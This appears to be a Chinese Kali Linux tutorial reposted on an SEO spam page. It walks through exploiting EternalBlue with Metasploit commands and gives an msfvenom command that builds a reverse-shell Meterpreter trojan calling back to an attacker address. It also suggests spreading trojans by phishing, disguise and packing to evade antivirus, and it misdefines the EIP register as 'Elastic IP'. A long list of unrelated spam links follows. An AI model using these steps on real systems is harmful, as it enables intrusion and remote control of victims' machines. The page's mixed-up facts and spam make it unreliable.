当前位置: 首页 > news >正文

写作网站都有哪些ppp友情链接百科

写作网站都有哪些ppp,友情链接百科,简单的购物网站怎么做,长治做网站哪家好目录 黑客法则: 一:页面使用基础 二:msf和Windows永恒之蓝漏洞 kali最强渗透工具——metasploit 介绍 使用永恒之蓝进行攻击 ​编辑 使用kali渗透工具生成远程控制木马 渗透测试——信息收集 域名信息收集 黑客法则: 一&…

目录

黑客法则:

一:页面使用基础

二:msf和Windows永恒之蓝漏洞

kali最强渗透工具——metasploit

介绍

使用永恒之蓝进行攻击

​编辑 使用kali渗透工具生成远程控制木马

渗透测试——信息收集

域名信息收集


黑客法则:

一:页面使用基础

1.kali十三大使用工具

2.打开终端

3.设置

二:msf和Windows永恒之蓝漏洞

kali最强渗透工具——metasploit

介绍

定义:

msf是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。

shellcode是一段用于利用软件漏洞而执行的代码,shellcode为16进制的机器码,因为经常让攻击者获得shell而得名。 shellcode常常使用机器语言编写。 可在暂存器eip溢出后,塞入一段可让CPU执行的shellcode机器码,让电脑可以执行攻击者的任意指令。

eip定义:

弹性公网IP (Elastic IP,简称EIP)提供独立的公网IP资源,包括公网IP地址与公网出口带宽服务。为资源配置弹性公网IP后,可以直接访问Internet,如果资源只配置了私网IP就无法直接访Internet。
快捷键:

ctrl加shift加+;ctrl加- 调整字符大小

使用永恒之蓝进行攻击

命令行调整用户:

sudo su
sudo 用户名 

打开msf: 

msfconsole

msfconsole:console(管理口) 

msf搜索模块:

search  ms17_010

 使用模块:

use 0
use exploit/windows/smb/ms17_010_eternalblue

查看当前模块的设置 

show options
options

测试win7和kali虚拟机的连通性

kali虚拟机IP地址

ip a

win7虚拟机IP地址

ipconfig

 可以相互ping通

kali ping win7

win7 ping kali

设置IP地址为目标

set RHOSTS 172.16.100.220

源监听地址 

tcp的逻辑端口:LPORT(0-65535)只要不被占用,可以随意修改 

 运行程序

 使用kali渗透工具生成远程控制木马

帮助命令

help

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=172.16.100.129 lport=60000 -f exe -o demo60000.exe

background

真实情况下,木马如何传播呢? 

一:采用网站的漏洞,进行二次上传

二:通过伪装、免杀、绑定进行钓鱼

免杀 

加壳:themida

渗透测试——信息收集

定义:

信息收集是指通过各种方式获取所需要的信息,以便我们在后续的渗透过程更好的进行。比如目标站点IP、中间件、脚本语言、端口、邮箱等等。信息收集包含资产收集但不限于资产收集。
意义:

●信息收集是渗透测试成功的保障
●更多的暴露面
●更大的可能性

分类:

●主动信息收集
通过直接访问网站在网站上进行操作、对网站进行扫描等,这种是有网络流量经过目标服务器的信息收集方式。
●被动信息收集
基于公开的渠道,比如搜索引擎等,在不与目标系统直接交互的情况下获取信息,并且尽量避免留下痕迹。
内容:

●服务器信息(端口、服务、真实IP)
●网站信息(网站架构(操作系统、中间件、数据库、编程语言)、指纹信息、WAF、敏感目录、敏感文件、源码泄露、旁站查询、C段查询)
●域名信息(whois、 备案信息、子域名)
●人员信息(姓名、职务、生日、联系电话、邮件地址)
 

域名信息收集

域名(Domain Name),简称域名、网域,是由- -串用点分隔的名字组成的Internet.上某一 台计算机或计算机组的名称,用于在数据传输时标识计算机的电子方位(有时也指地理位置)
DNS (域名系统,Domain Name System)是互联网的一项服务。它作为将域名和IP地址相互映射的一个分布式数据库,能够使人更方便地访问互联网。
 

http://www.bjxfkj.com.cn/article/101824.html

相关文章:

  • 最大的购物平台seo优化交流
  • 怎样用jsp做网站北京网站建设公司优势
  • 网站上的动图都怎么做的网站怎么提升关键词排名
  • wordpress 删除页眉网络关键词优化软件
  • 网站建设的基本知识营销方式方案案例
  • 南头手机公司网站建设如何做好互联网营销
  • 网站做不了301重定向百度推荐现在为什么不能用了
  • 怎么做自己的店铺网站备案查询站长工具
  • 网站网络广告如何建设重庆seo技术教程博客
  • 婚嫁行业网站模板搜索引擎营销分类
  • 攀枝花网站建设公司免费开源代码网站
  • 网站建设基础型网络营销就业方向和前景
  • 网站需求分析网站建设seo网站优化助理
  • 福建省龙岩市建设培训中心网站seo引擎搜索网站关键词
  • 东莞网络推广运营平台企业网站排名优化公司
  • 网站建设 网赚源码程序|任务网程序|开心兼职广告任务网源码seo托管服务
  • 公司网站内容更新该怎么做seo千享科技
  • 哈尔滨网站设计网络营销专业可以干什么工作
  • 西安网站建设公司排接广告推广
  • 武汉市网站开发公司360广告联盟平台
  • 龙岗成交型网站建设网络推广员是什么
  • 网站运营外包协议深圳网络营销全网推广
  • dw做网站小技巧网络营销的培训课程
  • wordpress 编辑 插件下载比优化更好的词是
  • 优秀购物网站网络营销推广的方式有哪些
  • 怎么做网站收录的关键词seo网站推广主要目的不包括
  • 怎么做网站安全性测试公司企业网站模板
  • 进不了wordpress网站关键词优化代理
  • 顺德网站制作案例平台百度惠生活怎么优化排名
  • 摄影网站开发专业技能培训机构